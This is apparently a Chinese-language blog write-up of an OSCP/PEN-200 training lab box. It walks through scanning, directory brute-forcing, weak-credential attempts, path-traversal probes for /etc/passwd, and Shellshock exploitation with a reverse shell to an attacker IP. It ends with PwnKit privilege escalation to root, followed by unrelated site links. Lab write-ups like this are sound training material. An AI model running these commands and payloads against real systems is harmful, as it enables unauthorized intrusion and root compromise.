【pen200-lab】10.11.1.72
创始人
2024-03-01 14:13:11

pen200-lab 学习笔记

【pen200-lab】10.11.1.72


🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • pen200-lab 学习笔记
    • 信息收集
    • 80
        • 目录爆破

信息收集

nmap -p- --min-rate 10000 -A 10.11.1.7122/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1af6a70dedc273a16fa3086828b53bbb (RSA)
|   256 e6438959f985d8e2bbe3d7ed285cc565 (ECDSA)
|_  256 3b0bf3843c7d6e2b2c811194169b717d (ED25519)
80/tcp open  http    Apache/2.4.7 (Ubuntu)
|_http-server-header: Apache/2.4.7 (Ubuntu)与次同时我将开启nmap脚本自动扫描
./nmapAutomator.sh --host 10.11.1.71 --type All

80

首先进行
在这里插入图片描述
support@bigtreecms.org

在这里插入图片描述

目录爆破

gobuster dir -u http://10.11.1.71/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 

在这里插入图片描述发现了phpmyadmin目录

在这里插入图片描述我将尝试下面的弱口令
admin \ “” (blank), admin \ admin, admin \ password
root \ “” (blank), root \ root, root \ password

可惜都失败了
紧接着我将查看刚才扫描出来的readme

curl 10.11.1.71/README.md

没有任何东西
在这里插入图片描述
紧接着,由于这是apache服务器,我将查看cgi

┌──(root㉿kali)-[~/Desktop/OSCP/OSCP TEST]
└─# gobuster dir -u http://10.11.1.71/ -w /usr/share/wfuzz/wordlist/vulns/cgis.txt  -e -b "400,404,403" -q
http://10.11.1.71/%2e/                 (Status: 302) [Size: 0] [--> site/index.php/]                                                                    
http://10.11.1.71/./                   (Status: 302) [Size: 0] [--> site/index.php/]                                                                    
http://10.11.1.71/cgi-bin/admin.cgi    (Status: 200) [Size: 821]
http://10.11.1.71/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd (Status: 200) [Size: 820]
http://10.11.1.71/cgi-bin/test.cgi     (Status: 200) [Size: 1049834]
http://10.11.1.71/index.php/123        (Status: 302) [Size: 0] [--> site/index.php/]                                                                    
http://10.11.1.71/index.php/\          (Status: 302) [Size: 0] [--> site/index.php/]                                                                    
http://10.11.1.71/index.php?IDAdmin=test (Status: 302) [Size: 0] [--> site/index.php/]                                                                  
http://10.11.1.71/index.php?SqlQuery=test%20 (Status: 302) [Size: 0] [--> site/index.php/]                                                              
http://10.11.1.71/index.php?base=test%20 (Status: 302) [Size: 0] [--> site/index.php/]                                                                  
http://10.11.1.71/index.php?action=search&searchFor=\ (Status: 302) [Size: 0] [--> site/index.php/]
http://10.11.1.71/index.php?download=/etc/passwd (Status: 302) [Size: 0] [--> site/index.php/]                                                          
http://10.11.1.71/index.php?download=/windows/win.ini (Status: 302) [Size: 0] [--> site/index.php/]
http://10.11.1.71/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc (Status: 302) [Size: 0] [--> site/index.php/]                              
http://10.11.1.71/index.php?file=index.php (Status: 302) [Size: 0] [--> site/index.php/]                                                                
http://10.11.1.71/index.php?file=Liens&op=\ (Status: 302) [Size: 0] [--> site/index.php/]                                                               
http://10.11.1.71/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd (Status: 302) [Size: 0] [--> site/index.php/]
http://10.11.1.71/index.php?download=/winnt/win.ini (Status: 302) [Size: 0] [--> site/index.php/]                                                       
http://10.11.1.71/index.php?page=../../../../../../../../../../etc/passwd (Status: 302) [Size: 0] [--> site/index.php/]                                 
http://10.11.1.71/index.php?tampon=test%20 (Status: 302) [Size: 0] [--> site/index.php/]                                                                
http://10.11.1.71/index.php?module=My_eGallery (Status: 302) [Size: 0] [--> site/index.php/]                                                            
http://10.11.1.71/index.php?page=../../../../../../../../../../boot.ini (Status: 302) [Size: 0] [--> site/index.php/]                                   
http://10.11.1.71/index.php?pymembs=admin (Status: 302) [Size: 0] [--> site/index.php/]                                                                 
http://10.11.1.71/index.php?sql_debug=1 (Status: 302) [Size: 0] [--> site/index.php/]                                                                   
http://10.11.1.71/index.php?|=../../../../../../../../../etc/passwd (Status: 302) [Size: 0] [--> site/index.php/]                                       
http://10.11.1.71/index.php?vo=        (Status: 302) [Size: 0] [--> site/index.php/]                        
http://10.11.1.71/cgi-bin/admin.cgi    (Status: 200) [Size: 821]
http://10.11.1.71/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd (Status: 200) [Size: 820]
http://10.11.1.71/cgi-bin/test.cgi     (Status: 200) [Size: 1049834]
http://10.11.1.71/cgi-bin/test.cgi

这个挺有意思
在这里插入图片描述这与我们哟哦能够自动扫描具有同样的结果
在这里插入图片描述
自动扫描结果如下,显示他可能收到shellshock攻击

OSVDB-112004: /cgi-bin/admin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/admin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278)

我利用如下的脚本利用

https://github.com/b4keSn4ke/CVE-2014-6271python exp.py 192.168.119.207 8888 http://10.11.1.71/cgi-bin/admin.cgi

我们成功获得了www用户

接着获取一个稳定的shell

python -c 'import pty;pty.spawn ("/bin/bash")'

接下来我们用linpeas.sh去枚举一些信息
在这里插入图片描述发现橘黄色信号
在这里插入图片描述利用的脚本如下
https://github.com/c3c/CVE-2021-4034
而后传输赋权即可

在这里插入图片描述
我们获得了root
紧接着在root目录中获得最终flag
在这里插入图片描述

上一篇:MySQL——进阶

下一篇:Word2010入门

相关内容

热门资讯

demo什么意思 demo版本... 618快到了,各位的小金库大概也在准备开闸放水了吧。没有小金库的,也该向老婆撒娇卖萌服个软了,一切只...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
世界上最漂亮的人 世界上最漂亮... 此前在某网上,选出了全球265万颜值姣好的女性。从这些数量庞大的女性群体中,人们投票选出了心目中最美...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
猫咪吃了塑料袋怎么办 猫咪误食... 你知道吗?塑料袋放久了会长猫哦!要说猫咪对塑料袋的喜爱程度完完全全可以媲美纸箱家里只要一有塑料袋的响...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...